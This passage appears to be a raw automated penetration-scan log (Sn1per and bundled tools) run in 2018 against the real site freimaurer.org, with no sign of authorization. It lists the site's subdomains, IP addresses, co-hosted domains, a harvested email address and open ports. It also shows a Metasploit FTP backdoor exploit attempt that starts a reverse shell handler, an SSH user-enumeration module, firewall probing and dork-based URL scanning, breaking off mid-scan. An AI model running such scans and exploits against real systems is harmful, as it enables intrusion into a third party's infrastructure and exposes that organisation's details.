  702. Google: acgl.freimaurer.org
  703. Google: 275.freimaurer.org
  704. [-] Saving results to file: /usr/share/sniper/loot/freimaurer.org/domains/domains-freimaurer.org.txt
  705. [-] Total Unique Subdomains Found: 34
  706. www.freimaurer.org
  707. 275.freimaurer.org
  708. www.aasr.freimaurer.org
  709. acgl.freimaurer.org
  710. lzf.bad-homburg.freimaurer.org
  711. rde.berlin.freimaurer.org
  712. bibliothek.freimaurer.org
  713. bibliotheksverein.freimaurer.org
  714. cervantes.bonn.freimaurer.org
  715. azb.bremen.freimaurer.org
  716. herder.bremen.freimaurer.org
  717. quatuor.coronati.freimaurer.org
  718. jdeze.darmstadt.freimaurer.org
  719. forum.freimaurer.org
  720. www.forum.freimaurer.org
  721. frzd3qu.freimaurer.org
  722. azgz.goettingen.freimaurer.org
  723. absalom.hamburg.freimaurer.org
  724. www.fzf.hamburg.freimaurer.org
  725. r5r.heidelberg.freimaurer.org
  726. zdr.iserlohn.freimaurer.org
  727. jahrbuch.freimaurer.org
  728. lzt.karlsruhe.freimaurer.org
  729. konvent.freimaurer.org
  730. lessing.muenchen.freimaurer.org
  731. mueffelmann.muenster.freimaurer.org
  732. museum.freimaurer.org
  733. mx0.freimaurer.org
  734. zd3p.nuernberg.freimaurer.org
  735. senat.freimaurer.org
  736. erasmus.stuttgart.freimaurer.org
  737. furchtlos-und-treu.stuttgart.freimaurer.org
  738. gzde.uelzen.freimaurer.org
  739. mozart.wiesbaden.freimaurer.org
  740. #######################################################################################################################################
  741. __
  742. ____ _____ ___ ______ _/ /_____ ____ ___
  743. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  744. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  745. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  746. /_/ discover v0.5.0 - by @michenriksen
  747.  
  748. Identifying nameservers for freimaurer.org... Done
  749. Using nameservers:
  750.  
  751. - 80.237.128.10
  752. - 217.115.143.140
  753.  
  754. Checking for wildcard DNS... Done
  755.  
  756. Running collector: HackerTarget... Done (2 hosts)
  757. Running collector: Shodan... Skipped
  758. -> Key 'shodan' has not been set
  759. Running collector: Wayback Machine... Error
  760. -> buffer error
  761. Running collector: Riddler... Skipped
  762. -> Key 'riddler_username' has not been set
  763. Running collector: Certificate Search... Done (3 hosts)
  764. Running collector: Google Transparency Report... Done (3 hosts)
  765. Running collector: Censys... Skipped
  766. -> Key 'censys_secret' has not been set
  767. Running collector: PTRArchive... Error
  768. -> PTRArchive returned unexpected response code: 502
  769. Running collector: PassiveTotal... Skipped
  770. -> Key 'passivetotal_key' has not been set
  771. Running collector: VirusTotal... Skipped
  772. -> Key 'virustotal' has not been set
  773. Running collector: Netcraft... Done (0 hosts)
  774. Running collector: Threat Crowd... Done (0 hosts)
  775. Running collector: Dictionary... Done (26 hosts)
  776. Running collector: PublicWWW... Done (3 hosts)
  777. Running collector: DNSDB... Done (7 hosts)
  778.  
  779. Resolving 39 unique hosts...
  780. 80.237.132.155 .freimaurer.org
  781. 80.237.132.155 freimaurer.org
  782. 157.97.40.186 jahrbuch.freimaurer.org
  783. 188.94.254.85 konvent.freimaurer.org
  784. 188.94.254.85 senat.freimaurer.org
  785. 80.237.132.155 www.freimaurer.org
  786.  
  787. Found subnets:
  788.  
  789. - 80.237.132.0-255 : 3 hosts
  790. - 188.94.254.0-255 : 2 hosts
  791.  
  792. Wrote 6 hosts to:
  793.  
  794. - file:///root/aquatone/freimaurer.org/hosts.txt
  795. - file:///root/aquatone/freimaurer.org/hosts.json
  796. __
  797. ____ _____ ___ ______ _/ /_____ ____ ___
  798. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  799. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  800. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  801. /_/ takeover v0.5.0 - by @michenriksen
  802.  
  803. Loaded 6 hosts from /root/aquatone/freimaurer.org/hosts.json
  804. Loaded 25 domain takeover detectors
  805.  
  806. Identifying nameservers for freimaurer.org... Done
  807. Using nameservers:
  808.  
  809. - 80.237.128.10
  810. - 217.115.143.140
  811.  
  812. Checking hosts for domain takeover vulnerabilities...
  813.  
  814. Finished checking hosts:
  815.  
  816. - Vulnerable : 0
  817. - Not Vulnerable : 6
  818.  
  819. Wrote 0 potential subdomain takeovers to:
  820.  
  821. - file:///root/aquatone/freimaurer.org/takeovers.json
  822.  
  823. __
  824. ____ _____ ___ ______ _/ /_____ ____ ___
  825. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  826. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  827. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  828. /_/ scan v0.5.0 - by @michenriksen
  829.  
  830. Loaded 6 hosts from /root/aquatone/freimaurer.org/hosts.json
  831.  
  832. Probing 6 ports...
  833. 80/tcp 188.94.254.85 konvent.freimaurer.org, senat.freimaurer.org
  834. 443/tcp 188.94.254.85 konvent.freimaurer.org, senat.freimaurer.org
  835. 80/tcp 80.237.132.155 .freimaurer.org, freimaurer.org, www.freimaurer.org
  836. 443/tcp 157.97.40.186 jahrbuch.freimaurer.org
  837. 80/tcp 157.97.40.186 jahrbuch.freimaurer.org
  838.  
  839. Wrote open ports to file:///root/aquatone/freimaurer.org/open_ports.txt
  840. Wrote URLs to file:///root/aquatone/freimaurer.org/urls.txt
  841. __
  842. ____ _____ ___ ______ _/ /_____ ____ ___
  843. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  844. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  845. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  846. /_/ gather v0.5.0 - by @michenriksen
  847.  
  848. Installing Nightmare.js package, please wait... Done
  849.  
  850. Processing 9 pages...
  851. Processed: http://80.237.132.155/ (www.freimaurer.org) - 403 Forbidden
  852. Processed: http://80.237.132.155/ (.freimaurer.org) - 403 Forbidden
  853. Processed: http://157.97.40.186/ (jahrbuch.freimaurer.org) - 200 OK
  854. Processed: http://188.94.254.85/ (senat.freimaurer.org) - 200 OK
  855. Processed: https://188.94.254.85/ (konvent.freimaurer.org) - 403 Forbidden
  856. Processed: https://188.94.254.85/ (senat.freimaurer.org) - 403 Forbidden
  857. Processed: https://157.97.40.186/ (jahrbuch.freimaurer.org) - 403 Forbidden
  858. Processed: http://80.237.132.155/ (freimaurer.org) - 200 OK
  859. Processed: http://188.94.254.85/ (konvent.freimaurer.org) - 200 OK
  860.  
  861. Finished processing pages:
  862.  
  863. - Successful : 9
  864. - Failed : 0
  865.  
  866. Generating report...done
  867. Report pages generated:
  868.  
  869. - file:///root/aquatone/freimaurer.org/report/report_page_0.html
  870. #######################################################################################################################################
  871. [+] Emails found:
  872. --------------------------------------------------------------------------------------------------------------------------------------
  873. azgz.goettingen@freimaurer.org
  874.  
  875. [+] Hosts found in search engines:
  876. ---------------------------------------------------------------------------------------------------------------------------------------
  877. [-] Resolving hostnames IPs...
  878. 80.237.132.155:www.freimaurer.org
  879. [+] Virtual hosts:
  880. =======================================================================================================================================
  881. 80.237.132.155 freimaurer.org
  882. 80.237.132.155 www.ecvo.org
  883. 80.237.132.155 www.wohn-projekt-bau.de
  884. 80.237.132.155 www.deko-banner.de
  885. 80.237.132.155 www.anna-heringer
  886. 80.237.132.155 pukall.de
  887. 80.237.132.155 www.rieswick.de
  888. 80.237.132.155 www.land-direkt.de
  889. 80.237.132.155 kleintierkardiologie.at
  890. 80.237.132.155 www.ecvoconference
  891. 80.237.132.155 www.zimmereiheidtmann.de
  892. 80.237.132.155 seidel-weidezaun.de
  893. 80.237.132.155 www.stadt-harburg-schwaben.de
  894. 80.237.132.155 www.anubhab.net
  895. 80.237.132.155 www.tubw.de
  896. 80.237.132.155 www.carbonice.net
  897. 80.237.132.155 www.radl-laden-rasp.de
  898. 80.237.132.155 www.schnider-lang.de
  899. 80.237.132.155 www.goodlife-web.de
  900. 80.237.132.155 www.anna-heringer.com
  901. 80.237.132.155 www.hautaerzte-koeln-sued.de
  902. 80.237.132.155 www.gs-kissenbrueck.de
  903. 80.237.132.155 www.duerckheim-register.de
  904. 80.237.132.155 www.kila-purzelbaum.de
  905. 80.237.132.155 www.atk.de
  906. 80.237.132.155 www.fc-alkofen.de
  907. 80.237.132.155 www.zahnaerzte-bergmannstrasse.de
  908. #######################################################################################################################################
  909. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 04:54 EDT
  910. Warning: 80.237.132.155 giving up on port because retransmission cap hit (2).
  911. Nmap scan report for freimaurer.org (80.237.132.155)
  912. Host is up (0.48s latency).
  913. Other addresses for freimaurer.org (not scanned): 2a01:488:42:1000:50ed:849b:ff7a:c9cb
  914. rDNS record for 80.237.132.155: wp148.webpack.hosteurope.de
  915. Not shown: 460 closed ports, 6 filtered ports
  916. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  917. PORT STATE SERVICE
  918. 21/tcp open ftp
  919. 22/tcp open ssh
  920. 80/tcp open http
  921. 110/tcp open pop3
  922. 143/tcp open imap
  923. 587/tcp open submission
  924. 993/tcp open imaps
  925. 995/tcp open pop3s
  926. 3306/tcp open mysql
  927. 10080/tcp open amanda
  928.  
  929. Nmap done: 1 IP address (1 host up) scanned in 8.55 seconds
  930. #######################################################################################################################################
  931. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 04:55 EDT
  932. Nmap scan report for freimaurer.org (80.237.132.155)
  933. Host is up (0.75s latency).
  934. Other addresses for freimaurer.org (not scanned): 2a01:488:42:1000:50ed:849b:ff7a:c9cb
  935. rDNS record for 80.237.132.155: wp148.webpack.hosteurope.de
  936.  
  937. PORT STATE SERVICE
  938. 53/udp open|filtered domain
  939. 67/udp open|filtered dhcps
  940. 68/udp open|filtered dhcpc
  941. 69/udp open|filtered tftp
  942. 88/udp open|filtered kerberos-sec
  943. 123/udp open ntp
  944. 137/udp open|filtered netbios-ns
  945. 138/udp open|filtered netbios-dgm
  946. 139/udp open|filtered netbios-ssn
  947. 161/udp open|filtered snmp
  948. 162/udp open|filtered snmptrap
  949. 389/udp open|filtered ldap
  950. 520/udp open|filtered route
  951. 2049/udp open|filtered nfs
  952.  
  953. Nmap done: 1 IP address (1 host up) scanned in 4.60 seconds
  954. #######################################################################################################################################
  955. + -- --=[Port 21 opened... running tests...
  956. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 04:55 EDT
  957. Nmap scan report for freimaurer.org (80.237.132.155)
  958. Host is up (0.0056s latency).
  959. Other addresses for freimaurer.org (not scanned): 2a01:488:42:1000:50ed:849b:ff7a:c9cb
  960. rDNS record for 80.237.132.155: wp148.webpack.hosteurope.de
  961.  
  962. PORT STATE SERVICE VERSION
  963. 21/tcp filtered ftp
  964. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  965. Device type: firewall|general purpose
  966. Running: Linux 2.4.X|2.6.X, ISS embedded
  967. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  968. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  969.  
  970. TRACEROUTE (using proto 1/icmp)
  971. HOP RTT ADDRESS
  972. 1 ... 30
  973.  
  974. RHOST => freimaurer.org
  975. RHOSTS => freimaurer.org
  976. [*] freimaurer.org:21 - Banner: 220 2a01:488:42:1000:50ed:849b:ff7a:c9cb FTP server ready
  977. [*] freimaurer.org:21 - USER: 331 Password required for PFt:)
  978. [*] Exploit completed, but no session was created.
  979. [*] Started reverse TCP double handler on 2001:18c0:11c:fe00:a835:5d29:3ab8:c69d:4444
  980. [*] freimaurer.org:21 - Sending Backdoor Command
  981. [-] freimaurer.org:21 - Not backdoored
  982. [*] Exploit completed, but no session was created.
  983. + -- --=[Port 22 opened... running tests...
  984. [exception] did not receive banner.
  985. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 04:56 EDT
  986. Nmap scan report for freimaurer.org (80.237.132.155)
  987. Host is up (0.18s latency).
  988. Other addresses for freimaurer.org (not scanned): 2a01:488:42:1000:50ed:849b:ff7a:c9cb
  989. rDNS record for 80.237.132.155: wp148.webpack.hosteurope.de
  990.  
  991. PORT STATE SERVICE VERSION
  992. 22/tcp filtered ssh
  993. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  994. Device type: firewall|general purpose
  995. Running: Linux 2.4.X|2.6.X, ISS embedded
  996. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  997. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  998.  
  999. TRACEROUTE (using proto 1/icmp)
  1000. HOP RTT ADDRESS
  1001. 1 ... 30
  1002.  
  1003. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1004. Nmap done: 1 IP address (1 host up) scanned in 11.88 seconds
  1005. _ _
  1006. / \ /\ __ _ __ /_/ __
  1007. | |\ / | _____ \ \ ___ _____ | | / \ _ \ \
  1008. | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
  1009. |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
  1010. |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
  1011.  
  1012.  
  1013. =[ metasploit v4.16.49-dev ]
  1014. + -- --=[ 1750 exploits - 1003 auxiliary - 304 post ]
  1015. + -- --=[ 536 payloads - 40 encoders - 10 nops ]
  1016. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  1017.  
  1018. USER_FILE => /BruteX/wordlists/simple-users.txt
  1019. RHOSTS => freimaurer.org
  1020. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  1021. RHOST => freimaurer.org
  1022. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
  1023. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
  1024. [*] freimaurer.org:22 - Scanned 1 of 2 hosts (50% complete)
  1025. [*] freimaurer.org:22 - Scanned 2 of 2 hosts (100% complete)
  1026. [*] Auxiliary module execution completed
  1027. #######################################################################################################################################
  1028. ^ ^
  1029. _ __ _ ____ _ __ _ _ ____
  1030. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1031. | V V // o // _/ | V V // 0 // 0 // _/
  1032. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1033. <
  1034. ...'
  1035.  
  1036. WAFW00F - Web Application Firewall Detection Tool
  1037.  
  1038. By Sandro Gauci && Wendel G. Henrique
  1039.  
  1040. Checking http://freimaurer.org
  1041. Generic Detection results:
  1042. The site http://freimaurer.org seems to be behind a WAF or some sort of security solution
  1043. Reason: The server header is different when an attack is detected.
  1044. The server header for a normal response is "Apache", while the server header a response to an attack is "nginx.",
  1045. Number of requests: 11
  1046. ######################################################################################################################################
  1047. + -- --=[Checking if X-Content options are enabled on freimaurer.org...
  1048.  
  1049. + -- --=[Checking if X-Frame options are enabled on freimaurer.org...
  1050.  
  1051. + -- --=[Checking if X-XSS-Protection header is enabled on freimaurer.org...
  1052.  
  1053. + -- --=[Checking HTTP methods on freimaurer.org...
  1054.  
  1055. + -- --=[Checking if TRACE method is enabled on freimaurer.org...
  1056.  
  1057. + -- --=[Checking for META tags on freimaurer.org...
  1058. <meta name="robots" content="noarchive">
  1059. <meta name="robots" content="noindex, follow">
  1060. <meta name="revisit-after" content="1 day">
  1061.  
  1062. + -- --=[Checking for open proxy on freimaurer.org...
  1063. </tr>
  1064. </table>
  1065. </td>
  1066. </tr>
  1067. </table>
  1068. </td>
  1069. </tr>
  1070. </table>
  1071. </body>
  1072. </html>
  1073.  
  1074. + -- --=[Enumerating software on freimaurer.org...
  1075. Server: Apache
  1076.  
  1077. + -- --=[Checking if Strict-Transport-Security is enabled on freimaurer.org...
  1078.  
  1079. + -- --=[Checking for Flash cross-domain policy on freimaurer.org...
  1080. </p>
  1081.  
  1082. <h2>Error 403</h2>
  1083. <address>
  1084. <a href="/">freimaurer.org</a><br />
  1085. <span>Apache</span>
  1086. </address>
  1087. </body>
  1088. </html>
  1089.  
  1090.  
  1091. + -- --=[Checking for Silverlight cross-domain policy on freimaurer.org...
  1092. </p>
  1093.  
  1094. <h2>Error 403</h2>
  1095. <address>
  1096. <a href="/">freimaurer.org</a><br />
  1097. <span>Apache</span>
  1098. </address>
  1099. </body>
  1100. </html>
  1101.  
  1102.  
  1103. + -- --=[Checking for HTML5 cross-origin resource sharing on freimaurer.org...
  1104.  
  1105. + -- --=[Retrieving robots.txt on freimaurer.org...
  1106. </p>
  1107.  
  1108. <h2>Error 403</h2>
  1109. <address>
  1110. <a href="/">freimaurer.org</a><br />
  1111. <span>Apache</span>
  1112. </address>
  1113. </body>
  1114. </html>
  1115.  
  1116.  
  1117. + -- --=[Retrieving sitemap.xml on freimaurer.org...
  1118. </p>
  1119.  
  1120. <h2>Error 403</h2>
  1121. <address>
  1122. <a href="/">freimaurer.org</a><br />
  1123. <span>Apache</span>
  1124. </address>
  1125. </body>
  1126. </html>
  1127.  
  1128.  
  1129. + -- --=[Checking cookie attributes on freimaurer.org...
  1130.  
  1131. + -- --=[Checking for ASP.NET Detailed Errors on freimaurer.org...
  1132. If you think this is a server error, please contact
  1133. <h2>Error 403</h2>
  1134. If you think this is a server error, please contact
  1135. <h2>Error 403</h2>
  1136. #######################################################################################################################################
  1137.  
  1138. _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
  1139. (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
  1140. (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
  1141. \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
  1142. \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
  1143. /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
  1144. [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
  1145.  
  1146. #######################################################################################################################################
  1147. --------------------------------------------------------------------------------------------------------------------------------------
  1148.  
  1149. [ ! ] Starting SCANNER INURLBR 2.1 at [15-04-2018 04:58:21]
  1150. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1151. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1152. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1153.  
  1154. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-freimaurer.org.txt ]
  1155. [ INFO ][ DORK ]::[ site:freimaurer.org ]
  1156. [ INFO ][ SEARCHING ]:: {
  1157. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.bh ]
  1158.  
  1159. [ INFO ][ SEARCHING ]::
  1160. -[:::]
  1161. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1162.  
  1163. [ INFO ][ SEARCHING ]::
  1164. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1165. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.co.zm ID: 005911257635119896548:iiolgmwf2se ]
  1166.  
  1167. [ INFO ][ SEARCHING ]::
  1168. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1169.  
  1170. [ INFO ][ TOTAL FOUND VALUES ]:: [ 37 ]
  1171.  
  1172.  
  1173. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1174. |_[ + ] [ 0 / 37 ]-[04:58:41] [ - ]
  1175. |_[ + ] Target:: [ http://freimaurer.org/ ]
  1176. |_[ + ] Exploit::
  1177. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1178. |_[ + ] More details::
  1179. |_[ + ] Found:: UNIDENTIFIED
  1180.  
  1181. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1182. |_[ + ] [ 1 / 37 ]-[04:58:42] [ - ]
  1183. |_[ + ] Target:: [ http://freimaurer.org/impressum/ ]
  1184. |_[ + ] Exploit::
  1185. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1186. |_[ + ] More details::
  1187. |_[ + ] Found:: UNIDENTIFIED
  1188.  
  1189. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1190. |_[ + ] [ 2 / 37 ]-[04:58:42] [ - ]
  1191. |_[ + ] Target:: [ http://freimaurer.org/kontakt/ ]
  1192. |_[ + ] Exploit::
  1193. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1194. |_[ + ] More details::
  1195. |_[ + ] Found:: UNIDENTIFIED
  1196.  
  1197. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1198. |_[ + ] [ 3 / 37 ]-[04:58:42] [ - ]
  1199. |_[ + ] Target:: [ http://freimaurer.org/datenschutz/ ]
  1200. |_[ + ] Exploit::
  1201. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1202. |_[ + ] More details::
  1203. |_[ + ] Found:: UNIDENTIFIED
  1204.  
  1205. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1206. |_[ + ] [ 4 / 37 ]-[04:58:42] [ - ]
  1207. |_[ + ] Target:: [ http://freimaurer.org/en ]
  1208. |_[ + ] Exploit::
  1209. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1210. |_[ + ] More details::
  1211. |_[ + ] Found:: UNIDENTIFIED
  1212.  
  1213. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1214. |_[ + ] [ 5 / 37 ]-[04:58:43] [ - ]
  1215. |_[ + ] Target:: [ http://freimaurer.org/freimaurerei/ ]
  1216. |_[ + ] Exploit::
  1217. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1218. |_[ + ] More details::
  1219. |_[ + ] Found:: UNIDENTIFIED
  1220.  
  1221. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1222. |_[ + ] [ 6 / 37 ]-[04:58:43] [ - ]
  1223. |_[ + ] Target:: [ http://freimaurer.org/category/news/ ]
  1224. |_[ + ] Exploit::
  1225. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1226. |_[ + ] More details::
  1227. |_[ + ] Found:: UNIDENTIFIED
  1228.  
  1229. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1230. |_[ + ] [ 7 / 37 ]-[04:58:43] [ - ]
  1231. |_[ + ] Target:: [ http://freimaurer.org/en/imprint/ ]
  1232. |_[ + ] Exploit::
  1233. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1234. |_[ + ] More details::
  1235. |_[ + ] Found:: UNIDENTIFIED
  1236.  
  1237. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1238. |_[ + ] [ 8 / 37 ]-[04:58:43] [ - ]
  1239. |_[ + ] Target:: [ http://freimaurer.org/category/feierlichkeiten/ ]
  1240. |_[ + ] Exploit::
  1241. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1242. |_[ + ] More details::
  1243. |_[ + ] Found:: UNIDENTIFIED
  1244.  
  1245. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1246. |_[ + ] [ 9 / 37 ]-[04:58:44] [ - ]
  1247. |_[ + ] Target:: [ http://freimaurer.org/category/zusammenkuenfte/ ]
  1248. |_[ + ] Exploit::
  1249. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1250. |_[ + ] More details::
  1251. |_[ + ] Found:: UNIDENTIFIED
  1252.  
  1253. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1254. |_[ + ] [ 10 / 37 ]-[04:58:44] [ - ]
  1255. |_[ + ] Target:: [ http://freimaurer.org/en/contact/ ]
  1256. |_[ + ] Exploit::
  1257. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1258. |_[ + ] More details::
  1259. |_[ + ] Found:: UNIDENTIFIED
  1260.  
  1261. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1262. |_[ + ] [ 11 / 37 ]-[04:58:44] [ - ]
  1263. |_[ + ] Target:: [ http://freimaurer.org/freimaurer-wiki/ ]
  1264. |_[ + ] Exploit::
  1265. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1266. |_[ + ] More details::
  1267. |_[ + ] Found:: UNIDENTIFIED
  1268.  
  1269. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1270. |_[ + ] [ 12 / 37 ]-[04:58:44] [ - ]
  1271. |_[ + ] Target:: [ http://freimaurer.org/tag/loge/ ]
  1272. |_[ + ] Exploit::
  1273. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1274. |_[ + ] More details::
  1275. |_[ + ] Found:: UNIDENTIFIED
  1276.  
  1277. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1278. |_[ + ] [ 13 / 37 ]-[04:58:45] [ - ]
  1279. |_[ + ] Target:: [ http://freimaurer.org/tag/landesloge/ ]
  1280. |_[ + ] Exploit::
  1281. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1282. |_[ + ] More details::
  1283. |_[ + ] Found:: UNIDENTIFIED
  1284.  
  1285. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1286. |_[ + ] [ 14 / 37 ]-[04:58:45] [ - ]
  1287. |_[ + ] Target:: [ http://freimaurer.org/en/freemasonry/ ]
  1288. |_[ + ] Exploit::
  1289. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1290. |_[ + ] More details::
  1291. |_[ + ] Found:: UNIDENTIFIED
  1292.  
  1293. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1294. |_[ + ] [ 15 / 37 ]-[04:58:45] [ - ]
  1295. |_[ + ] Target:: [ http://freimaurer.org/tag/tempelarbeit/ ]
  1296. |_[ + ] Exploit::
  1297. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1298. |_[ + ] More details::
  1299. |_[ + ] Found:: UNIDENTIFIED
  1300.  
  1301. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1302. |_[ + ] [ 16 / 37 ]-[04:58:46] [ - ]
  1303. |_[ + ] Target:: [ http://azb.bremen.freimaurer.org/index.php/literatur ]
  1304. |_[ + ] Exploit::
  1305. |_[ + ] Information Server:: , , IP::0
  1306. |_[ + ] More details::
  1307. |_[ + ] Found:: UNIDENTIFIED
  1308. |_[ + ] ERROR CONECTION:: Could not resolve host: azb.bremen.freimaurer.org
  1309.  
  1310. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1311. |_[ + ] [ 17 / 37 ]-[04:58:46] [ - ]
  1312. |_[ + ] Target:: [ http://freimaurer.org/impressum/?s= ]
  1313. |_[ + ] Exploit::
  1314. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1315. |_[ + ] More details::
  1316. |_[ + ] Found:: UNIDENTIFIED
  1317.  
  1318. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1319. |_[ + ] [ 18 / 37 ]-[04:58:46] [ - ]
  1320. |_[ + ] Target:: [ http://freimaurer.org/kontakt/?s= ]
  1321. |_[ + ] Exploit::
  1322. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1323. |_[ + ] More details::
  1324. |_[ + ] Found:: UNIDENTIFIED
  1325.  
  1326. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1327. |_[ + ] [ 19 / 37 ]-[04:58:47] [ - ]
  1328. |_[ + ] Target:: [ http://freimaurer.org/en/privacy-policy/ ]
  1329. |_[ + ] Exploit::
  1330. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: Apache , IP:2a01:488:42:1000:50ed:849b:ff7a:c9cb:80
  1331. |_[ + ] More details::
  1332. |_[ + ] Found:: UNIDENTIFIED
  1333.  
  1334. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1335. |_[ + ] [ 20 / 37 ]-[04:58:47] [ - ]
  1336. |_[ + ] Target:: [ http://www.aasr.freimaurer.org/index.php/8-vgl-aktuell ]
  1337. |_[ + ] Exploit::
